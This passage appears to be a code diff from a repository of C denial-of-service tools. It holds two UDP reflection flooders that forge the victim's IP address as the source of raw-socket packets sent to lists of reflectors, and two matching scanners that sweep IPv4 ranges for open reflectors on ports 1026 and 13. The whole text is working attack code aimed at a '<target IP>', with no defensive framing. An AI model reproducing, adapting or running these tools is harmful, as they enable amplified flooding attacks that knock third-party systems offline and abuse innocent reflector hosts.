return (unsigned short)(~sum);
|
||||
}
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 1;
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = IPPROTO_UDP;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
void setup_udp_header(struct udphdr *udph)
|
||||
{
|
||||
udph->source = htons(5678);
|
||||
udph->dest = htons(1026);
|
||||
udph->check = 0;
|
||||
memcpy((void *)udph + sizeof(struct udphdr), "0x01", 1);
|
||||
udph->len=htons(sizeof(struct udphdr) + 1);
|
||||
}
|
||||
void *flood(void *par1)
|
||||
{
|
||||
struct thread_data *td = (struct thread_data *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
|
||||
struct sockaddr_in sin = td->sin;
|
||||
struct list *list_node = td->list_node;
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_udp_header(udph);
|
||||
udph->source = htons(rand() % 65535 - 1026);
|
||||
iph->saddr = sin.sin_addr.s_addr;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
|
||||
list_node = list_node->next;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <target port> <reflection file> <threads> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
srand(time(NULL));
|
||||
int i = 0;
|
||||
head = NULL;
|
||||
fprintf(stdout, "Setting up sockets...\n");
|
||||
int max_len = 128;
|
||||
char *buffer = (char *) malloc(max_len);
|
||||
buffer = memset(buffer, 0x00, max_len);
|
||||
int num_threads = atoi(argv[4]);
|
||||
int maxpps = atoi(argv[5]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
int multiplier = 20;
|
||||
FILE *list_fd = fopen(argv[3], "r");
|
||||
while (fgets(buffer, max_len, list_fd) != NULL) {
|
||||
if ((buffer[strlen(buffer) - 1] == '\n') ||
|
||||
(buffer[strlen(buffer) - 1] == '\r')) {
|
||||
buffer[strlen(buffer) - 1] = 0x00;
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct list *)malloc(sizeof(struct list));
|
||||
bzero(&head->data, sizeof(head->data));
|
||||
head->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct list *new_node = (struct list *)malloc(sizeof(struct list));
|
||||
memset(new_node, 0x00, sizeof(struct list));
|
||||
new_node->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
i++;
|
||||
} else {
|
||||
continue;
|
||||
}
|
||||
}
|
||||
struct list *current = head->next;
|
||||
pthread_t thread[num_threads];
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_addr.s_addr = inet_addr(argv[1]);
|
||||
struct thread_data td[num_threads];
|
||||
for(i = 0;i<num_threads;i++){
|
||||
td[i].thread_id = i;
|
||||
td[i].sin= sin;
|
||||
td[i].list_node = current;
|
||||
pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
|
||||
}
|
||||
fprintf(stdout, "Starting flood...\n");
|
||||
for(i = 0;i<(atoi(argv[6])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,306 @@
|
|||
#include <pcap.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h> // for exit()
|
||||
#include <string.h> //for memset
|
||||
#include <sys/ioctl.h>
|
||||
#include <net/if.h>
|
||||
#include <sys/socket.h>
|
||||
#include <arpa/inet.h> // for inet_ntoa()
|
||||
#include <net/ethernet.h>
|
||||
#include <netinet/udp.h> //Provides declarations for udp header
|
||||
#include <netinet/ip.h> //Provides declarations for ip header
|
||||
#include <pthread.h>
|
||||
#include <semaphore.h>
|
||||
#include <signal.h>
|
||||
#include <sys/resource.h>
|
||||
#include <unistd.h>
|
||||
static unsigned int payloadsize = 1;
|
||||
static unsigned int xport = 1026;
|
||||
void process_packet(void *args, struct pcap_pkthdr *header, void *buffer);
|
||||
|
||||
struct buffer
|
||||
{
|
||||
void *data;
|
||||
int size;
|
||||
struct buffer *next;
|
||||
struct buffer *prev;
|
||||
};
|
||||
struct buffer *head;
|
||||
|
||||
char *ipv4;
|
||||
int processed,over,total,i,j;
|
||||
struct sockaddr_in dest;
|
||||
pthread_mutex_t buf_mutex = PTHREAD_MUTEX_INITIALIZER;
|
||||
sem_t loop_sem;
|
||||
int running_threads = 0;
|
||||
volatile int found_srvs = 0;
|
||||
volatile unsigned long per_thread = 0;
|
||||
volatile unsigned long start = 0;
|
||||
volatile unsigned long scanned = 0;
|
||||
int sleep_between = 0;
|
||||
volatile int bytes_sent = 0;
|
||||
volatile unsigned long hosts_done = 0;
|
||||
FILE *fd;
|
||||
|
||||
void *readthread()
|
||||
{
|
||||
struct buffer *ourhead = head;
|
||||
struct sockaddr_in saddr;
|
||||
while(1)
|
||||
{
|
||||
sem_wait(&loop_sem);
|
||||
while(ourhead->data == NULL){ ourhead = ourhead->next; }
|
||||
pthread_mutex_lock(&buf_mutex);
|
||||
void *buf = malloc(ourhead->size);
|
||||
int size = ourhead->size;
|
||||
memcpy(buf, ourhead->data, ourhead->size);
|
||||
free(ourhead->data);
|
||||
ourhead->data = NULL;
|
||||
ourhead->size = 0;
|
||||
pthread_mutex_unlock(&buf_mutex);
|
||||
memset(&saddr, 0, sizeof(saddr));
|
||||
struct iphdr *iph = (struct iphdr*)(buf + sizeof(struct ethhdr));
|
||||
saddr.sin_addr.s_addr = iph->saddr;
|
||||
struct udphdr *udph = (struct udphdr *)(buf + sizeof(struct ethhdr) + sizeof(struct iphdr));
|
||||
if(ntohs(udph->source) == xport)
|
||||
{
|
||||
int body_length = size - sizeof(struct ethhdr) - sizeof(struct iphdr) - sizeof(struct udphdr);
|
||||
fprintf(fd,"%s %d\n",inet_ntoa(saddr.sin_addr),body_length);
|
||||
fflush(fd);
|
||||
found_srvs++;
|
||||
}
|
||||
free(buf);
|
||||
processed++;
|
||||
ourhead = ourhead->next;
|
||||
}
|
||||
}
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
running_threads++;
|
||||
int thread_id = (int)par1;
|
||||
unsigned long start_ip = htonl(ntohl(start)+(per_thread*thread_id));
|
||||
unsigned long end = htonl(ntohl(start)+(per_thread*(thread_id+1)));
|
||||
unsigned long w;
|
||||
int y;
|
||||
unsigned char buf[65536];
|
||||
memcpy(buf, "\x00", payloadsize);
|
||||
int sizeofpayload = payloadsize;
|
||||
int sock;
|
||||
if((sock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))<0) {
|
||||
perror("cant open socket");
|
||||
exit(-1);
|
||||
}
|
||||
for(w=ntohl(start_ip);w<htonl(end);w++)
|
||||
{
|
||||
struct sockaddr_in servaddr;
|
||||
bzero(&servaddr, sizeof(servaddr));
|
||||
servaddr.sin_family = AF_INET;
|
||||
servaddr.sin_addr.s_addr=htonl(w);
|
||||
servaddr.sin_port=htons(xport);
|
||||
sendto(sock,(char *)buf,sizeofpayload,0, (struct sockaddr *)&servaddr,sizeof(servaddr));
|
||||
bytes_sent+=sizeofpayload;
|
||||
scanned++;
|
||||
hosts_done++;
|
||||
usleep(sleep_between*1000);
|
||||
}
|
||||
close(sock);
|
||||
running_threads--;
|
||||
return;
|
||||
}
|
||||
|
||||
void sighandler(int sig)
|
||||
{
|
||||
fclose(fd);
|
||||
printf("\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
void *printthread(void *argvs)
|
||||
{
|
||||
char **argv = (char **)argvs;
|
||||
int threads = atoi(argv[4]);
|
||||
pthread_t thread;
|
||||
sleep(1);
|
||||
char *str_start = malloc(18);
|
||||
memset(str_start, 0, 18);
|
||||
str_start = argv[1];
|
||||
char *str_end = malloc(18);
|
||||
memset(str_end, 0, 18);
|
||||
str_end = argv[2];
|
||||
start = inet_addr(str_start);
|
||||
per_thread = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start))) / threads;
|
||||
unsigned long toscan = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start)));
|
||||
int i;
|
||||
for(i = 0;i<threads;i++){
|
||||
pthread_create( &thread, NULL, &flood, (void *) i);
|
||||
}
|
||||
char *temp = (char *)malloc(17);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Reflectors");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "IP/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Bytes/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Threads");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "%");
|
||||
printf("%s", temp);
|
||||
printf("\n");
|
||||
|
||||
char *new;
|
||||
new = (char *)malloc(16*6);
|
||||
while (running_threads > 0)
|
||||
{
|
||||
printf("\r");
|
||||
memset(new, '\0', 16*6);
|
||||
sprintf(new, "%s|%-15lu", new, found_srvs);
|
||||
sprintf(new, "%s|%-15d", new, scanned);
|
||||
sprintf(new, "%s|%-15d", new, bytes_sent);
|
||||
sprintf(new, "%s|%-15d", new, running_threads);
|
||||
memset(temp, 0, 17);
|
||||
int percent_done=((double)(hosts_done)/(double)(toscan))*100;
|
||||
sprintf(temp, "%d%%", percent_done);
|
||||
sprintf(new, "%s|%s", new, temp);
|
||||
printf("%s", new);
|
||||
fflush(stdout);
|
||||
bytes_sent=0;
|
||||
scanned = 0;
|
||||
sleep(1);
|
||||
}
|
||||
printf("\n");
|
||||
fclose(fd);
|
||||
exit(0);
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[ ])
|
||||
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "The right fucking way: %s <1.0.0.0> <255.255.255.255> <list> <threads> <delay>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
fd = fopen(argv[3], "a");
|
||||
sleep_between = atoi(argv[5]);
|
||||
int num_threads = atoi(argv[4]);
|
||||
|
||||
const rlim_t kOpenFD = 1024 + (num_threads * 2);
|
||||
struct rlimit rl;
|
||||
int result;
|
||||
rl.rlim_cur = kOpenFD;
|
||||
rl.rlim_max = kOpenFD;
|
||||
result = setrlimit(RLIMIT_NOFILE, &rl);
|
||||
if (result != 0)
|
||||
{
|
||||
perror("setrlimit_nofile");
|
||||
fprintf(stderr, "setrlimit_nofile returned result = %d\n", result);
|
||||
}
|
||||
bzero(&rl, sizeof(struct rlimit));
|
||||
rl.rlim_cur = 256 * 1024;
|
||||
rl.rlim_max = 4096 * 1024;
|
||||
result = setrlimit(RLIMIT_STACK, &rl);
|
||||
if (result != 0)
|
||||
{
|
||||
perror("setrlimit_stack");
|
||||
fprintf(stderr, "setrlimit_stack returned result = %d\n", result);
|
||||
}
|
||||
|
||||
signal(SIGINT, &sighandler);
|
||||
|
||||
pcap_if_t *alldevsp;
|
||||
pcap_t *handle; //Handle of the device that shall be sniffed
|
||||
|
||||
char errbuf[100] , *devname , devs[100][100];
|
||||
int count = 1 , n;
|
||||
|
||||
if( pcap_findalldevs( &alldevsp , errbuf) )
|
||||
{
|
||||
exit(1);
|
||||
}
|
||||
|
||||
devname = alldevsp->name;
|
||||
ipv4 = malloc(16);
|
||||
bzero(ipv4, 16);
|
||||
struct ifreq ifc;
|
||||
int res;
|
||||
int sockfd = socket(AF_INET, SOCK_DGRAM, 0);
|
||||
|
||||
if(sockfd < 0) exit(-1);
|
||||
strcpy(ifc.ifr_name, devname);
|
||||
res = ioctl(sockfd, SIOCGIFADDR, &ifc);
|
||||
close(sockfd);
|
||||
if(res < 0) exit(-1);
|
||||
strcpy(ipv4, inet_ntoa(((struct sockaddr_in*)&ifc.ifr_addr)->sin_addr));
|
||||
printf("Opening device %s for sniffing ... " , devname);
|
||||
handle = pcap_open_live(devname , 65536 , 1 , 0 , errbuf);
|
||||
|
||||
if (handle == NULL)
|
||||
{
|
||||
fprintf(stderr, "Couldn't open device %s : %s\n" , devname , errbuf);
|
||||
exit(1);
|
||||
}
|
||||
printf("Done\n");
|
||||
|
||||
sem_init(&loop_sem, 0, -1);
|
||||
i = 1024*1000;
|
||||
while(i--)
|
||||
{
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct buffer *)malloc(sizeof(struct buffer));
|
||||
bzero(head, sizeof(struct buffer));
|
||||
head->data = NULL;
|
||||
head->size = 0;
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct buffer *new_node = (struct buffer *)malloc(sizeof(struct buffer));
|
||||
bzero(new_node, sizeof(struct buffer));
|
||||
new_node->data = NULL;
|
||||
new_node->size = 0;
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
}
|
||||
|
||||
pthread_t prnthread;
|
||||
pthread_create( &prnthread, NULL, &printthread, (void *)argv);
|
||||
pthread_t redthread;
|
||||
pthread_create( &redthread, NULL, &readthread, NULL);
|
||||
|
||||
pcap_loop(handle , -1 , process_packet , NULL);
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
void process_packet(void *args, struct pcap_pkthdr *header, void *buffer)
|
||||
{
|
||||
int size = header->len;
|
||||
|
||||
//Get the IP Header part of this packet , excluding the ethernet header
|
||||
struct iphdr *iph = (struct iphdr*)(buffer + sizeof(struct ethhdr));
|
||||
memset(&dest, 0, sizeof(dest));
|
||||
dest.sin_addr.s_addr = iph->daddr;
|
||||
|
||||
if(iph->protocol == 17 && strcmp(inet_ntoa(dest.sin_addr), ipv4) == 0)
|
||||
{
|
||||
//toss into buffer
|
||||
if(head->data != NULL) over++;
|
||||
pthread_mutex_lock(&buf_mutex);
|
||||
void *temp = malloc(size);
|
||||
memcpy(temp, buffer, size);
|
||||
head->data = temp;
|
||||
head->size = size;
|
||||
head = head->next;
|
||||
pthread_mutex_unlock(&buf_mutex);
|
||||
sem_post(&loop_sem);
|
||||
total++;
|
||||
}
|
||||
}
|
|
@ -0,0 +1,211 @@
|
|||
/*
|
||||
* This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
|
||||
*/
|
||||
#include <time.h>
|
||||
#include <pthread.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/udp.h>
|
||||
#include <arpa/inet.h>
|
||||
#define MAX_PACKET_SIZE 8192
|
||||
#define PHI 0x9e3779b9
|
||||
static uint32_t Q[4096], c = 362436;
|
||||
struct list
|
||||
{
|
||||
struct sockaddr_in data;
|
||||
struct list *next;
|
||||
struct list *prev;
|
||||
};
|
||||
struct list *head;
|
||||
volatile int tehport;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
|
||||
void init_rand(uint32_t x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++)
|
||||
{
|
||||
Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
|
||||
}
|
||||
}
|
||||
uint32_t rand_cmwc(void)
|
||||
{
|
||||
uint64_t t, a = 18782LL;
|
||||
static uint32_t i = 4095;
|
||||
uint32_t x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int nwords)
|
||||
{
|
||||
unsigned long sum = 0;
|
||||
for (sum = 0; nwords > 0; nwords--)
|
||||
sum += *buf++;
|
||||
sum = (sum >> 16) + (sum & 0xffff);
|
||||
sum += (sum >> 16);
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 1;
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = IPPROTO_UDP;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
void setup_udp_header(struct udphdr *udph)
|
||||
{
|
||||
udph->source = htons(5678);
|
||||
udph->dest = htons(13);
|
||||
udph->check = 0;
|
||||
memcpy((void *)udph + sizeof(struct udphdr), "0x01", 1);
|
||||
udph->len=htons(sizeof(struct udphdr) + 1);
|
||||
}
|
||||
void *flood(void *par1)
|
||||
{
|
||||
struct thread_data *td = (struct thread_data *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
|
||||
struct sockaddr_in sin = td->sin;
|
||||
struct list *list_node = td->list_node;
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_udp_header(udph);
|
||||
udph->source = htons(rand() % 65535 - 1026);
|
||||
iph->saddr = sin.sin_addr.s_addr;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
|
||||
list_node = list_node->next;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <target port> <reflection file> <threads> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
srand(time(NULL));
|
||||
int i = 0;
|
||||
head = NULL;
|
||||
fprintf(stdout, "Setting up sockets...\n");
|
||||
int max_len = 128;
|
||||
char *buffer = (char *) malloc(max_len);
|
||||
buffer = memset(buffer, 0x00, max_len);
|
||||
int num_threads = atoi(argv[4]);
|
||||
int maxpps = atoi(argv[5]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
int multiplier = 20;
|
||||
FILE *list_fd = fopen(argv[3], "r");
|
||||
while (fgets(buffer, max_len, list_fd) != NULL) {
|
||||
if ((buffer[strlen(buffer) - 1] == '\n') ||
|
||||
(buffer[strlen(buffer) - 1] == '\r')) {
|
||||
buffer[strlen(buffer) - 1] = 0x00;
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct list *)malloc(sizeof(struct list));
|
||||
bzero(&head->data, sizeof(head->data));
|
||||
head->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct list *new_node = (struct list *)malloc(sizeof(struct list));
|
||||
memset(new_node, 0x00, sizeof(struct list));
|
||||
new_node->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
i++;
|
||||
} else {
|
||||
continue;
|
||||
}
|
||||
}
|
||||
struct list *current = head->next;
|
||||
pthread_t thread[num_threads];
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_addr.s_addr = inet_addr(argv[1]);
|
||||
struct thread_data td[num_threads];
|
||||
for(i = 0;i<num_threads;i++){
|
||||
td[i].thread_id = i;
|
||||
td[i].sin= sin;
|
||||
td[i].list_node = current;
|
||||
pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
|
||||
}
|
||||
fprintf(stdout, "Starting flood...\n");
|
||||
for(i = 0;i<(atoi(argv[6])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,305 @@
|
|||
#include <pcap.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h> // for exit()
|
||||
#include <string.h> //for memset
|
||||
#include <sys/ioctl.h>
|
||||
#include <net/if.h>
|
||||
#include <sys/socket.h>
|
||||
#include <arpa/inet.h> // for inet_ntoa()
|
||||
#include <net/ethernet.h>
|
||||
#include <netinet/udp.h> //Provides declarations for udp header
|
||||
#include <netinet/ip.h> //Provides declarations for ip header
|
||||
#include <pthread.h>
|
||||
#include <semaphore.h>
|
||||
#include <signal.h>
|
||||
#include <sys/resource.h>
|
||||
#include <unistd.h>
|
||||
|
||||
void process_packet(void *args, struct pcap_pkthdr *header, void *buffer);
|
||||
|
||||
struct buffer
|
||||
{
|
||||
void *data;
|
||||
int size;
|
||||
struct buffer *next;
|
||||
struct buffer *prev;
|
||||
};
|
||||
struct buffer *head;
|
||||
|
||||
char *ipv4;
|
||||
int processed,over,total,i,j;
|
||||
struct sockaddr_in dest;
|
||||
pthread_mutex_t buf_mutex = PTHREAD_MUTEX_INITIALIZER;
|
||||
sem_t loop_sem;
|
||||
int running_threads = 0;
|
||||
volatile int found_srvs = 0;
|
||||
volatile unsigned long per_thread = 0;
|
||||
volatile unsigned long start = 0;
|
||||
volatile unsigned long scanned = 0;
|
||||
int sleep_between = 0;
|
||||
volatile int bytes_sent = 0;
|
||||
volatile unsigned long hosts_done = 0;
|
||||
FILE *fd;
|
||||
|
||||
void *readthread()
|
||||
{
|
||||
struct buffer *ourhead = head;
|
||||
struct sockaddr_in saddr;
|
||||
while(1)
|
||||
{
|
||||
sem_wait(&loop_sem);
|
||||
while(ourhead->data == NULL){ ourhead = ourhead->next; }
|
||||
pthread_mutex_lock(&buf_mutex);
|
||||
void *buf = malloc(ourhead->size);
|
||||
int size = ourhead->size;
|
||||
memcpy(buf, ourhead->data, ourhead->size);
|
||||
free(ourhead->data);
|
||||
ourhead->data = NULL;
|
||||
ourhead->size = 0;
|
||||
pthread_mutex_unlock(&buf_mutex);
|
||||
memset(&saddr, 0, sizeof(saddr));
|
||||
struct iphdr *iph = (struct iphdr*)(buf + sizeof(struct ethhdr));
|
||||
saddr.sin_addr.s_addr = iph->saddr;
|
||||
struct udphdr *udph = (struct udphdr *)(buf + sizeof(struct ethhdr) + sizeof(struct iphdr));
|
||||
if(ntohs(udph->source) == 13)
|
||||
{
|
||||
int body_length = size - sizeof(struct ethhdr) - sizeof(struct iphdr) - sizeof(struct udphdr);
|
||||
fprintf(fd,"%s %d\n",inet_ntoa(saddr.sin_addr),body_length);
|
||||
fflush(fd);
|
||||
found_srvs++;
|
||||
}
|
||||
free(buf);
|
||||
processed++;
|
||||
ourhead = ourhead->next;
|
||||
}
|
||||
}
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
running_threads++;
|
||||
int thread_id = (int)par1;
|
||||
unsigned long start_ip = htonl(ntohl(start)+(per_thread*thread_id));
|
||||
unsigned long end = htonl(ntohl(start)+(per_thread*(thread_id+1)));
|
||||
unsigned long w;
|
||||
int y;
|
||||
unsigned char buf[65536];
|
||||
memcpy(buf, " ", 1);
|
||||
int sizeofpayload = 1;
|
||||
int sock;
|
||||
if((sock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))<0) {
|
||||
perror("cant open socket");
|
||||
exit(-1);
|
||||
}
|
||||
for(w=ntohl(start_ip);w<htonl(end);w++)
|
||||
{
|
||||
struct sockaddr_in servaddr;
|
||||
bzero(&servaddr, sizeof(servaddr));
|
||||
servaddr.sin_family = AF_INET;
|
||||
servaddr.sin_addr.s_addr=htonl(w);
|
||||
servaddr.sin_port=htons(13);
|
||||
sendto(sock,(char *)buf,sizeofpayload,0, (struct sockaddr *)&servaddr,sizeof(servaddr));
|
||||
bytes_sent+=sizeofpayload;
|
||||
scanned++;
|
||||
hosts_done++;
|
||||
usleep(sleep_between*1000);
|
||||
}
|
||||
close(sock);
|
||||
running_threads--;
|
||||
return;
|
||||
}
|
||||
|
||||
void sighandler(int sig)
|
||||
{
|
||||
fclose(fd);
|
||||
printf("\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
void *printthread(void *argvs)
|
||||
{
|
||||
char **argv = (char **)argvs;
|
||||
int threads = atoi(argv[4]);
|
||||
pthread_t thread;
|
||||
sleep(1);
|
||||
char *str_start = malloc(18);
|
||||
memset(str_start, 0, 18);
|
||||
str_start = argv[1];
|
||||
char *str_end = malloc(18);
|
||||
memset(str_end, 0, 18);
|
||||
str_end = argv[2];
|
||||
start = inet_addr(str_start);
|
||||
per_thread = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start))) / threads;
|
||||
unsigned long toscan = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start)));
|
||||
int i;
|
||||
for(i = 0;i<threads;i++){
|
||||
pthread_create( &thread, NULL, &flood, (void *) i);
|
||||
}
|
||||
sleep(1);
|
||||
char *temp = (char *)malloc(17);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Found");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Host/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "B/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Running Thrds");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Done");
|
||||
printf("%s", temp);
|
||||
printf("\n");
|
||||
|
||||
char *new;
|
||||
new = (char *)malloc(16*6);
|
||||
while (running_threads > 0)
|
||||
{
|
||||
printf("\r");
|
||||
memset(new, '\0', 16*6);
|
||||
sprintf(new, "%s|%-15lu", new, found_srvs);
|
||||
sprintf(new, "%s|%-15d", new, scanned);
|
||||
